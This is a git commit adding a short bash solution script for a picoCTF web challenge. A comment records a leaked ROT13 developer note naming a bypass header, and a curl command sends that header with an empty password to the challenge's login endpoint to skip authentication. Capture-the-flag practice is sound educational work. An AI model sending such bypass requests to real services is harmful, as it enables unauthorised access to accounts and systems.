web/crack_the_gate_1
This commit is contained in:
Executable
+9
@@ -0,0 +1,9 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
# ROT13 encoded note in html: NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes"
|
||||
|
||||
curl \
|
||||
-X POST \
|
||||
-H "X-Dev-Access: yes" \
|
||||
--json '{"email":"ctf-player@picoctf.org","password":""}' \
|
||||
"http://amiable-citadel.picoctf.net:51025/login"
|
||||
Reference in New Issue
Block a user